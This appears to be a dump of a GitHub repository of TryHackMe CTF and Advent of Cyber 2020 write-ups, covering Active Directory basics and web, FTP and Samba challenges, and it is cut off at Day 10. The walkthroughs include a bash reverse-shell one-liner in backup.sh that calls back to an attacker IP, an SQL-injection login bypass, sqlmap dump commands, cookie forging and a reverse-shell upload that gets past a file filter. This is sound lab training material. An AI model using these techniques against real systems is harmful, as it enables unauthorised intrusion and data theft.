├── .github
├── FUNDING.yml
├── ISSUE_TEMPLATE
│ └── bug_report.md
└── auto_assign.yml
├── Active-Directory-Basics
└── README.md
├── Advent-of-Cyber-2020
├── Day-01-A_Christmas_Crisis
│ └── README.md
├── Day-02-The_Elf_Strikes_Back!
│ ├── README.md
│ └── reverse.jpeg.php
├── Day-03-Christmas_Chaos
│ ├── README.md
│ └── login.png
├── Day-04-Santa's_watching
│ ├── README.md
│ ├── create_list.py
│ └── site.png
├── Day-05-Someone_stole_Santa's_gift_list!
│ ├── README.md
│ └── santapanel.png
├── Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night
│ ├── README.md
│ └── santasportal.png
├── Day-07-The_Grinch_Really_Did_Steal_Christmas
│ ├── %2f
│ ├── AoC-2020.png
│ ├── Operation Artic Storm.pdf
│ ├── README.md
│ ├── christmas-tree.jpg
│ ├── elf_mcskidy_wishlist.txt
│ ├── pcap1.pcap
│ ├── pcap2.pcap
│ ├── pcap3.pcap
│ ├── selfie.jpg
│ └── tryhackme_logo_full.svg
├── Day-08-What's_Under_the_Christmas_Tree?
│ └── README.md
├── Day-09-Anyone_can_be_Santa!
│ ├── README.md
│ ├── backup.sh
│ ├── old_backup.sh
│ └── shoppinglist.txt
├── Day-10-Dont-be-sElfish
│ ├── README.md
│ └── note_from_mcskidy.txt
├── Day-11-The_Rogue_Gnome
│ ├── LinEnum.sh
│ └── README.md
├── Day-12-Ready,_set,_elf.
│ └── README.md
├── Day-13-Coal_for_Christmas
│ ├── README.md
│ └── dirty.c
├── Day-14-Where's Rudolph?
│ ├── README.md
│ ├── twitter.jpeg
│ └── twitterHR.jpeg
├── Day-15-There's a Python in my stocking!
│ └── README.md
├── Day-16-Help! Where is Santa?
│ ├── README.md
│ └── api_fuzzer.py
├── Day-17-ReverseELFneering
│ ├── README.md
│ └── r2_cs.pdf
├── Day-18-The_Bits_of_Christmas
│ └── README.md
├── Day-19-The_Naughty_or_Nice_List
│ ├── README.md
│ └── list.png
├── Day-20-PowershELlF_to_the_rescue
│ └── README.md
├── Day-21-Time_for_some_ELForensics
│ └── README.md
├── Day-22-Elf_McEager_becomes_CyberElf
│ └── README.md
├── Day-23-The_Grinch_strikes_again!
│ ├── README.md
│ └── win-ransomware.png
├── Day-24-The_Trial_Before_Christmas
│ └── README.md
├── README.md
├── advent.png
└── thm-certificate.png
├── Advent-of-Cyber-2021
├── Day-01-Save_The_Gifts
│ └── README.md
├── Day-02-Elf_HR_Problems
│ └── README.md
├── Day-03-Christmas_Blackout
│ └── README.md
├── Day-04-Santas_Running_Behind
│ └── README.md
├── Day-05-Pesky_Elf_Forum
│ └── README.md
├── Day-06-Patch_Management_Is_Hard
│ └── README.md
├── Day-07-Migration_Without_Security
│ └── README.md
├── Day-08-Santas_Bag_of_Toys
│ └── README.md
├── Day-09-Where_Is_All_This_Data_Going
│ ├── AoC3.pcap
│ └── README.md
├── Day-10-Offensive_Is_The_Best_Defence
│ └── README.md
├── Day-11-Where_Are_The_Reindeers
│ └── README.md
├── Day-12-Sharing_Without_Caring
│ └── README.md
├── Day-13-They_Lost_The_Plan
│ └── README.md
├── Day-14-Dev(Insecure)Ops
│ └── README.md
├── Day-15-The_Grinchs_day_off
│ └── README.md
├── Day-16-Ransomware_Madness
│ └── README.md
├── Day-17-Elf_Leaks
│ └── README.md
├── Day-18-Playing_With_Containers
│ └── README.md
├── Day-19-Something_Phishy_Is_Going_On
│ └── README.md
├── Day-20-What_s_the_Worst_That_Could_Happen
│ └── README.md
├── Day-21-Needles_In_Computer_Stacks
│ └── README.md
├── Day-22-How_It_Happened
│ └── README.md
├── Day-23-PowershELlF_Magic
│ └── README.md
├── Day-24-Learning_From_The_Grinch
│ └── README.md
├── README.md
├── aoc.png
└── aoc2021.png
├── Agent-Sudo
├── Alien_autospy.jpg
├── README.md
├── To_agentJ.txt
├── _cutie.png.extracted
│ ├── 365
│ ├── 365.zlib
│ ├── 8702.zip
│ ├── To_agentR.txt
│ └── zip.hash
├── cute-alien.jpg
├── cutie.png
└── message.txt
├── Anonymous
└── README.md
├── Attacking-Kerberos
└── README.md
├── Attacktive-Directory
└── README.md
├── Authenticate
└── README.md
├── Avengers-Blog
└── README.md
├── Baron-Samedit
└── README.md
├── Bash-Scripting
└── README.md
├── Bebop
└── README.md
├── Bolt
└── README.md
├── Bounty-Hacker
├── README.md
├── locks.txt
└── task.txt
├── Brooklyn-Nine-Nine
└── README.md
├── Brute-It
└── README.md
├── Burp-Suite
└── README.md
├── CC:-Radare2
└── README.md
├── CTF-collection-Vol.1
└── README.md
├── Chill-Hack
└── README.md
├── Common-Linux-Privesc
└── README.md
├── Cross-site-Scripting
└── README.md
├── Cyborg
└── README.md
├── Easy-Peasy
├── README.md
├── binarycodepixabay.jpg
├── easypeasy.txt
├── hash.txt
└── secrettext.txt
├── Encryption-Crypto-101
└── README.md
├── Erit-Securus-I
└── README.md
├── Game-Zone
└── README.md
├── GamingServer
└── README.md
├── Geolocating-Images
├── README.md
└── thm
│ ├── 1.jpeg
│ ├── 2.png
│ ├── 3.png
│ └── 4.png
├── Getting-Started
└── README.md
├── GoldenEye
├── README.md
└── goldeneye.jpg
├── Gotta-Catch'em-All
└── README.md
├── Hacking-with-Powershell
└── README.md
├── Hardening-Basics-Part-1
└── README.md
├── Hardening-Basics-Part-2
└── README.md
├── Hashing-Crypto_101
└── README.md
├── HeartBleed
└── README.md
├── IMAGES
└── THMlogo.png
├── Intro-PoC-Scripting
└── README.md
├── Intro-to-Python
├── README.md
└── decode.py
├── Intro-to-Windows
└── README.md
├── Introduction-to-Django
└── README.md
├── Introduction-to-Flask
└── README.md
├── Introduction-to-OWASP-ZAP
└── README.md
├── Introductory-Networking
└── README.md
├── JavaScript-Basics
├── README.md
└── sort.js
├── John-The-Ripper
└── README.md
├── Jurassic-Park
└── README.md
├── LFI-Basics
└── README.md
├── LFI
└── README.md
├── LICENSE
├── LazyAdmin
├── README.md
├── hash.txt
├── mysql_bakup_20191129023059-1.5.1.sql
└── rshell.php
├── Linux-Challenges
└── README.md
├── Linux-Fundamentals
├── Linux-Fundamentals-Part-1
│ └── README.md
├── Linux-Fundamentals-Part-2
│ └── README.md
└── Linux-Fundamentals-Part-3
│ └── README.md
├── Linux-Strength-Training
└── README.md
├── Linux:-Local-Enumeration
└── README.md
├── MAL:-REMnux-The_Redux
└── README.md
├── NIS-Linux_Part_I
└── README.md
├── Nessus
└── README.md
├── Network-Services-2
└── README.md
├── Network-Services
└── README.md
├── Networking
└── README.md
├── Ninja-Skills
└── README.md
├── Nmap
└── README.md
├── OWASP-Juice-Shop
├── README.md
└── ftp
│ ├── acquisitions.md
│ ├── announcement_encrypted.md
│ ├── coupons_2013.md.bak%00..md
│ ├── eastere.gg%00.md
│ ├── encrypt.pyc%00.md
│ ├── incident-support.kdbx
│ ├── legal.md
│ ├── package.json.bak%00.md
│ ├── quarantine
│ ├── juicy_malware_linux_amd_64.url
│ ├── juicy_malware_linux_arm_64.url
│ ├── juicy_malware_macos_64.url
│ └── juicy_malware_windows_64.exe.url
│ └── suspicious_errors.yml%00.md
├── OWASP-Top-10
├── 47887.py
├── 48973.txt
├── README.md
├── login-logs.txt
├── owasp.png
├── rce.py
└── webapp.db
├── Overpass
├── README.md
└── downloads
│ └── src
│ └── buildscript.sh
├── Overpass2-Hacked
├── README.md
├── fasttrack.txt
├── img.png
└── overpass2.pcapng
├── Persistence
└── README.md
├── Pickle-Rick
├── README.md
├── reverse-shell.sh
└── rickandmorty.jpeg
├── Post-Exploitation-Basics
└── README.md
├── README.md
├── Regular-expressions
└── README.md
├── Res
└── README.md
├── RootMe
├── README.md
└── reverse-shell.php5
├── SSRF
└── README.md
├── Searchlight-IMINT
└── README.md
├── Skynet
└── README.md
├── Starting-Out-In-Cyber-Sec
└── README.md
├── Startup
├── README.md
├── important.jpg
├── notice.txt
└── suspicious.pcapng
├── Steel-Mountain
└── README.md
├── Sublist3r
├── README.md
└── sub-output-nbc.txt
├── The-Cod-Caper
└── README.md
├── The-find-command
└── README.md
├── Toolbox-Vim
└── README.md
├── ToolsRus
└── README.md
├── Tor
└── README.md
├── Upload-Vulnerabilities
└── README.md
├── Web-Scanning
└── README.md
├── Wgel-CTF
└── README.md
├── What-the-Shell?
└── README.md
├── Windows-PrivEsc
└── README.md
├── Wireshark-101
└── README.md
├── XXE
└── README.md
├── Year-of-the-Rabbit
└── README.md
├── ZTH:-Obscure-Web-Vulns
└── README.md
├── ZTH:-Web_2
└── README.md
├── Zero-Logon
└── README.md
├── cc-pentesting
└── README.md
├── crack-the-hash
├── hash1_4.txt
├── hash2_1.txt
├── hash2_2.txt
└── hash2_3.txt
├── iOS-Forensics
└── README.md
├── ignite
├── 47138.py
├── fuel-cms-exploit.py
└── revshell.php
├── kenobi
├── id_rsa
└── log.txt
├── lianyu
├── Leave_me_alone.png
├── Queen's_Gambit.png
├── aa.jpg
├── exiftool_Queens_Gambit-output.txt
├── exiftool_aa-output.txt
├── exiftool_leave-me-alone-output.txt
├── exploit
├── exploit.c
├── exploit.c.save
├── gobuster-output.txt
├── gobuster-output2.txt
├── gobuster-output3.txt
├── nmap-output.txt
├── ss.zip
└── ss
│ ├── passwd.txt
│ └── shado
└── tomghost
└── README.md
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: edoardottt
2 | liberapay: edoardottt
3 | patreon: edoardottt
4 | ko_fi: edoardottt
5 | open_collective: edoardottt
6 | custom: "https://www.paypal.me/edoardottt"
7 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 |
11 |
--------------------------------------------------------------------------------
/.github/auto_assign.yml:
--------------------------------------------------------------------------------
1 | # Set to true to add reviewers to pull requests
2 | addReviewers: true
3 |
4 | # A list of reviewers to be added to pull requests (GitHub user name)
5 | reviewers:
6 | - edoardottt
7 |
8 | # A list of keywords to be skipped the process that add reviewers if pull requests include it
9 | skipKeywords:
10 | - wip
11 |
12 | # A number of reviewers added to the pull request
13 | # Set 0 to add all the reviewers (default: 0)
14 | numberOfReviewers: 0
15 |
--------------------------------------------------------------------------------
/Active-Directory-Basics/README.md:
--------------------------------------------------------------------------------
1 | # Active Directory Basics
2 |
3 | - I understand what Active Directory is and why it is used.
4 |
5 | no answer needed
6 |
7 | - What database does the AD DS contain?
8 |
9 | - `NTDS.dit`
10 |
11 | - Where is the NTDS.dit stored?
12 |
13 | - `%SystemRoot%\NTDS`
14 |
15 | - What type of machine can be a domain controller?
16 |
17 | - `Windows server`
18 |
19 | - What is the term for a hierarchy of domains in a network?
20 |
21 | - `tree`
22 |
23 | - What is the term for the rules for object creation?
24 |
25 | - `Domain schema`
26 |
27 | - What is the term for containers for groups, computers, users, printers, and other OUs?
28 |
29 | - `Organization units`
30 |
31 | - Which type of groups specify user permissions?
32 |
33 | - `Security groups`
34 |
35 | - Which group contains all workstations and servers joined to the domain?
36 |
37 | - `Domain computers`
38 |
39 | - Which group can publish certificates to the directory?
40 |
41 | - `Cert publisher`
42 |
43 | - Which user can make changes to a local machine but not to a domain controller?
44 |
45 | - `Local administrators`
46 |
47 | - Which group has their passwords replicated to read-only domain controllers?
48 |
49 | - `Allowed RODC Password Replication Group`
50 |
51 | - What type of trust flows from a trusting domain to a trusted domain?
52 |
53 | - `Directional`
54 |
55 | - What type of trusts expands to include other trusted domains?
56 |
57 | - `Transitive`
58 |
59 | - What type of authentication uses tickets?
60 |
61 | - `Kerberos`
62 |
63 | - What domain service can create, validate, and revoke public key certificates?
64 |
65 | - `Certificate Services`
66 |
67 | - What is the Azure AD equivalent of LDAP?
68 |
69 | - `Rest apis`
70 |
71 | - What is the Azure AD equivalent of Domains and Forests?
72 |
73 | - `Tenants`
74 |
75 | - What is the Windows Server AD equivalent of Guests?
76 |
77 | - `Trusts`
78 |
79 | - Deploy the machine
80 |
81 | no answer needed
82 |
83 | - What is the name of the Windows 10 operating system?
84 |
85 | - `Get-NetComputer -fulldata | select operatingsystem`
86 | - `*********** ** ********* **********`
87 |
88 | - What is the second "Admin" name?
89 |
90 | - `Get-NetUser | select cn`
91 | - `******`
92 |
93 | - Which group has a capital “V” in the group name?
94 |
95 | - `net localgroup`
96 | - `Hyper-V Administrators`
97 |
98 | - When was the password last set for the SQLService user?
99 |
100 | - `Get-ADUser -identity SQLService -properties *`
101 | - `5/**/2020 *:**:** PM`
102 |
103 | - I understand the basics of Active Directory
104 |
105 | no answer needed
106 |
107 |
108 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md:
--------------------------------------------------------------------------------
1 | # Day 1 - A Christmas Crisis
2 |
3 | - **Deploy your AttackBox (the blue "Start AttackBox" button)** and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP into the browser search bar.
4 |
5 | no answer needed
6 |
7 | - Register for an account, and then login.
8 | What is the name of the cookie used for authentication?
9 |
10 | - Go into a browser (I suggest you Chrome or Firefox) and fire up browser developers tools (F12). Go into the storage tab and select cookies on the left. `auth`.
11 |
12 | - In what format is the value of this cookie encoded?
13 |
14 | - `hexadecimal`
15 |
16 | - Having decoded the cookie, what format is the data stored in?
17 |
18 | - `json`
19 |
20 | - Figure out how to bypass the authentication.
21 | What is the value of Santa's cookie?
22 |
23 | - Decode your cookie value from hexadecimal to Text. I used [this](https://cryptii.com/pipes/hex-decoder). Then change your username to `santa`. You should have something like: `************************************************************************************************d65223a2253616e7461227d`
24 | - Now, if you change the previous cookie with this new one and refresh the page you will see some changes...
25 |
26 | - Now that you are the santa user, you can re-activate the assembly line!
27 | What is the flag you're given when the line is fully active?
28 |
29 | - `THM{********************************}`
30 |
31 | ## see you...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md:
--------------------------------------------------------------------------------
1 | # Day 2 - The Elf Strikes Back!
2 |
3 | - What string of text needs added to the URL to get access to the upload page?
4 |
5 | - `?id=YOUR-ID-HERE`
6 |
7 | - What type of file is accepted by the site?
8 |
9 | - Open the browser and check the page source code. You will find this string: ``
10 | - `image`
11 |
12 | - Bypass the filter and upload a reverse shell.
13 | In which directory are the uploaded files stored?
14 |
15 | - Change the ip in the file reverse.jpeg.php with your ip (in the vpn...so tun0) and upload that file.
16 |
17 | - `/uploads/`
18 |
19 | - Activate your reverse shell and catch it in a netcat listener!
20 |
21 | - `nc -lvnp 1234`
22 |
23 | - Go to `http:///uploads/` and click on reverse.jpeg.php
24 |
25 | - You should see a shell.
26 |
27 | - What is the flag in /var/www/flag.txt?
28 |
29 | - `cat /var/www/flag.txt`
30 |
31 | - `THM{**********************************}`
32 |
33 | ## see you ...
34 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-03-Christmas_Chaos/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-03-Christmas_Chaos/login.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md:
--------------------------------------------------------------------------------
1 | # Day 4 - Santa's watching
2 |
3 | Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of **YYYYMMDD**.
4 |
5 | Recommended list: [big.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt)
6 |
7 | - Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP (10.10.135.56) into the browser search bar.
8 |
9 | no answer needed
10 |
11 | If you navigate with your browser to the you should see this page:
12 |
13 |
14 | 
15 |
16 | - Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)
17 | **Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!**
18 |
19 | - `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`
20 |
21 | - Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?
22 |
23 | - `gobuster dir -u -w big.txt`
24 | - You will find a directory and the a php file.
25 |
26 | - Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
27 |
28 | - Execute the python file with `python3 create_list.py`. It will create a list for you with format `YYYYMMDD`.
29 | - `wfuzz -c -z file,YYYYMMDD-list.txt -d "date=FUZZ" --hw 0 http:///api/site-log.php`
30 | - Executing this command, it will try to fuzz the date parameter, and I've inserted the --hw parameter set to 0 because I tried few times and I saw the incorrect answers contains no words.
31 | - The only respone you get is from one word. Just append that word, let's say is YYYYMMDD. Go to browser and query `http:///api/site-log.php?date=YYYYMMDD`.
32 | - `THM{********}`
33 |
34 | # see you ...
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | '''
3 | @author edoardottt
4 | '''
5 | starting_year = 2010
6 | current_year = 2020
7 |
8 | def pad_number(inp, length):
9 | if len(str(inp))==length: return str(inp)
10 | return (length - len(str(inp))) * "0" + str(inp)
11 |
12 | with open("YYYYMMDD-list.txt","w+") as f:
13 | for y in range(starting_year,current_year + 1):
14 | for m in range(1, 13):
15 | for d in range(1,32):
16 | f.write(pad_number(y,4) + pad_number(m,2) + pad_number(d,2) + "\n")
17 |
18 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-04-Santa's_watching/site.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-04-Santa's_watching/site.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md:
--------------------------------------------------------------------------------
1 | # Day 5 - Someone stole Santa's gift list!
2 |
3 | - Without using directory brute forcing, what's Santa's secret login panel?
4 |
5 | - You don't have to use a directory fuzzer because you will not find a list with this word.
6 | - `santapanel`
7 |
8 | You will see this page:
9 | 
10 |
11 | - Visit Santa's secret login panel and bypass the login using SQLi
12 |
13 | no answer needed
14 |
15 | - Just enter in the username field `' OR true --`
16 |
17 | - How many entries are there in the gift database?
18 |
19 | - `(' OR true --`
20 | - `22`
21 |
22 | - What did Paul ask for?
23 |
24 | - `github ownership`
25 |
26 | - What is the flag?
27 |
28 | - You have to enable the Burp option with FoxyProxy.
29 | - Then, open BurpSuie and perform a single request with the text field.
30 | - You will see BurpSuite opened with a http request. Send to repeater and save the item as shown in the explaining part previous the ctf.
31 | - Then start sqlmap with `sqlmap -r request.txt --tamper=space2comment --dump-all --dbms sqlite` taking request.txt as the saved file with BurpSuite.
32 | - (If sqlmap will ask you something, you have to try the largest attack you can, so try to perform all the tries you can; choosing y or n when it asks you).
33 | - `thmfox{***_*_****_***_*********_**_***}`
34 |
35 | - What is the admin password?
36 |
37 | - `****************`
38 |
39 | # see you ...
40 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/santapanel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/santapanel.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md:
--------------------------------------------------------------------------------
1 | # Day 6 - Be careful with what you wish on a Christmas night
2 |
3 | - Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machines IP (http://:5000) into the browser search bar (the webserver is running on port 5000, so make sure this is included in your web requests).
4 |
5 | no answer needed
6 |
7 | 
8 |
9 | - What vulnerability type was used to exploit the application?
10 |
11 | - `stored crosssite scripting`
12 |
13 | - What query string can be abused to craft a reflected XSS?
14 |
15 | - If you query one example on the first search bar, you will see there's a new char appended to URL.
16 | - `q`
17 |
18 | - Launch the OWASP ZAP Application
19 |
20 | no answer needed
21 |
22 | - Run a ZAP (zaproxy) automated scan on the target. How many alerts does it display?
23 |
24 | - `5`
25 |
26 | - How many types of XSS are there in the scan?
27 |
28 | - `2`
29 |
30 | - Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?
31 |
32 | no answer needed
33 |
34 | ## see you ...
35 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/santasportal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/santasportal.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/AoC-2020.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/AoC-2020.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/Operation Artic Storm.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/Operation Artic Storm.pdf
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # The Grinch Really Did Steal Christmas
2 |
3 | Download the ZIP file "aocpcaps.zip" that is attached to this task, use a combination of the filters and features of Wireshark we've covered to answer the questions below:
4 |
5 | - Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?
6 |
7 | - `10.11.3.2`
8 |
9 | - If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?
10 |
11 | - `http.request.method == get`
12 |
13 | - Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.199" visited?
14 |
15 | - `reindeer-of-the-week`
16 |
17 | - Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?
18 | There's a lot of irrelevant data here - Using a filter here would be useful!
19 |
20 | - `*********_********_******`
21 |
22 | - Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?
23 |
24 | - `ssh`
25 |
26 | - Analyse "pcap3.pcap" and recover Christmas!
27 | What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
28 |
29 | - `Rubber ducky`
30 |
31 | ## see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/christmas-tree.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/christmas-tree.jpg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt:
--------------------------------------------------------------------------------
1 | Wish list for Elf McSkidy
2 | -------------------------
3 | Budget: £100
4 |
5 | x3 Hak 5 Pineapples
6 | x1 Rubber ducky (to replace Elf McEager)
7 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap1.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap1.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap2.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap2.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/pcap3.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/selfie.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/selfie.jpg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md:
--------------------------------------------------------------------------------
1 | # What's unders the Christmas Tree?
2 |
3 |
4 | - When was Snort created?
5 |
6 | - A Google search is enough (as always...).
7 | - `1998`
8 |
9 | - Using Nmap on , what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)
10 |
11 | - `nmap `
12 | - `80,2222,3389`
13 |
14 | - Run a scan and provide the -Pn flag to ignore ICMP being used to determine if the host is up
15 |
16 | no answer needed
17 |
18 | - `nmap -Pn `
19 |
20 | - Experiment with different scan settings such as -A and -sV whilst comparing the outputs given.
21 |
22 | no answer needed
23 |
24 | - `nmap -A `
25 | - `nmap -sV `
26 |
27 | - Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?
28 |
29 | - `nmap -Pn -sV `
30 | - `Ubuntu`
31 |
32 | - Use Nmap's Network Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?
33 |
34 | - `nmap --script=http-title `
35 | - `blog`
36 |
37 | - Now use different scripts against the remaining services to discover any further information about them
38 |
39 | no answer needed
40 |
41 | - `nmap --script=vuln `
42 | - `nmap --script=ssh-auth-methods -p 2222 `
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md:
--------------------------------------------------------------------------------
1 | # Anyone can be Santa!
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - Name the directory on the FTP server that has data accessible by the "anonymous" user
9 |
10 | - `ftp ` and enter `anonymous`
11 | - `public`
12 |
13 | - What script gets executed within this directory?
14 |
15 | - `backup.sh`
16 |
17 | - What movie did Santa have on his Christmas shopping list?
18 |
19 | - (ftp) `get shoppinglist.txt`
20 | - `The polar express`
21 |
22 | - Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!
23 | Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have setup a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
24 |
25 | - Insert your IP address in `backup.sh` where is the lable.
26 | - (ftp) `put backup.sh`
27 | - On your machine `nc -lvnp 4444`
28 | - You should get a root shell in a minute.
29 | - `cat /root/flag.txt`
30 | - `THM{****_***_***_**_*****}`
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh:
--------------------------------------------------------------------------------
1 | bash -i >& /dev/tcp/10.9.126.198/4444 0>&1
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Created by ElfMcEager to backup all of Santa's goodies!
4 |
5 | # Create backups to include date DD/MM/YYYY
6 | filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";
7 |
8 | # Backup FTP folder and store in elfmceager's home directory
9 | tar -zcvf /home/elfmceager/$filename /opt/ftp
10 |
11 | # TO-DO: Automate transfer of backups to backup server
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt:
--------------------------------------------------------------------------------
1 | The Polar Express Movie
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md:
--------------------------------------------------------------------------------
1 | # Don't be sElfish!
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the " Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - Using enum4linux, how many users are there on the Samba server?
9 |
10 | - `enum4linux -a `
11 | - `3`
12 |
13 | - Now how many "shares" are there on the Samba server?
14 |
15 | - `4`
16 |
17 | - Use smbclient to try to login to the shares on the Samba server (10.10.151.244). What share doesn't require a password?
18 |
